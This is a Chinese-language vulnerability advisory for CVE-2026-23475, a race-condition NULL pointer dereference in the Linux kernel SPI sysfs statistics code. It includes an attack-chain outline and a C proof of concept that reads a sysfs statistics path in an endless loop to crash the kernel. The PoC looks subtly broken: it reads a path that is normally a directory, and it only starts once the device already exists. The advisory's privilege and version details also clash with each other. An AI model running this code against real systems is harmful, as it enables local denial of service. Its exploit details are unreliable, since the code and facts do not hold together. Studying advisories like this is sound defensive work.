CVE-2026-23475 CVSS 5.5 中危

CVE-2026-23475 Linux Kernel SPI子系统空指针解引用漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23475

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核SPI子系统存在空指针解引用漏洞。问题在于控制器向驱动核心注册后，per-CPU统计数据的分配被延迟执行，导致出现竞态窗口。在此期间，若本地低权限用户访问sysfs属性，内核将尝试读取尚未初始化的统计指针，进而触发异常导致系统崩溃，造成拒绝服务。

技术细节

该漏洞技术细节涉及Linux内核驱动的初始化顺序问题。在SPI子系统中，控制器的注册与统计内存的分配原本是分开的两个步骤。系统先注册控制器并暴露sysfs节点，随后才分配per-CPU变量。这种设计缺陷允许攻击者在两个步骤之间的极短窗口内，利用多线程或高频访问的方式抢占CPU资源，读取sysfs下的统计文件。此时内核代码试图通过未初始化的指针更新统计数据，导致NULL指针解引用。此漏洞属于本地竞态条件，无需特殊权限即可触发，最终导致内核死机或重启。

攻击链分析

STEP 1

初始访问

攻击者获得本地低权限用户访问权限。

STEP 2

监控与触发

攻击者监控或等待SPI控制器初始化，或在系统启动时执行脚本。

STEP 3

竞态利用

在SPI控制器注册后立即高频访问sysfs统计接口，利用分配延迟的窗口。

STEP 4

系统崩溃

触发内核空指针解引用，导致Kernel Panic或系统重启。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC to trigger race condition in SPI sysfs stats access
// Compile: gcc -o poc_spi poc_spi.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

#define SPI_STATS_PATH "/sys/class/spi_master/spi0/statistics"

void trigger_vuln() {
    int fd;
    char buffer[256];

    // Continuously try to access the sysfs statistics file
    // This attempts to hit the window between registration and allocation
    while(1) {
        fd = open(SPI_STATS_PATH, O_RDONLY);
        if (fd >= 0) {
            if (read(fd, buffer, sizeof(buffer)) > 0) {
                // Access successful, potentially triggering the NULL deref
                // if the kernel timing aligns with the vulnerable window
            }
            close(fd);
        } else {
            // Device not found or error, retry
        }
    }
}

int main() {
    printf("Attempting to trigger CVE-2026-23475...\n");
    trigger_vuln();
    return 0;
}

影响范围

Linux Kernel < 6.8 (未修复版本)

防御指南

临时缓解措施

限制非特权用户对sysfs文件系统的访问权限，或禁用相关的SPI驱动模块直至更新内核。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表